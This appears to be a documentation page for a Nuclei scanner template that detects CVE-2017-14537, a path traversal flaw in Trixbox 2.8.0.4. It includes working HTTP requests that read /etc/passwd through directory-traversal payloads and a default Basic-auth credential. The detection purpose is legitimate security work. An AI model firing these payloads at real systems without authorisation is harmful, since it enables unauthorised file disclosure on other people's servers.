Skip to content
Nuclei Templates

Trixbox 2.8.0 - Path Traversal

ID: CVE-2017-14537

Severity: medium

Author: pikpikcu

Tags: cve,cve2017,trixbox,lfi,packetstorm,netfortris

Description

Section titled “Description”

Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.

YAML Source

Section titled “YAML Source”
id: CVE-2017-14537


info:
  name: Trixbox 2.8.0 - Path Traversal
  author: pikpikcu
  severity: medium
  description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability.
  reference:
    - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
    - https://sourceforge.net/projects/asteriskathome/
    - http://packetstormsecurity.com/files/162853/Trixbox-2.8.0.4-Path-Traversal.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2017-14537
    cwe-id: CWE-22
    epss-score: 0.01002
    epss-percentile: 0.81968
    cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: netfortris
    product: trixbox
  tags: cve,cve2017,trixbox,lfi,packetstorm,netfortris


http:
  - raw:
      - |
        POST /maint/index.php?packages HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{Hostname}}/maint/index.php?packages
        Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
        Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=


        xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
      - |
        GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Referer: {{Hostname}}/maint/index.php?packages
        Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
        Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502202f0270e645e17931b1dc8ab775c80919e0820de0d0793227ec97ca01c81b3b5d0221009628de0b963d2694f262eb5c43c8edd77dc94fb2fc3f01d6c008dad05d252143:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-14537.yaml"

View on Github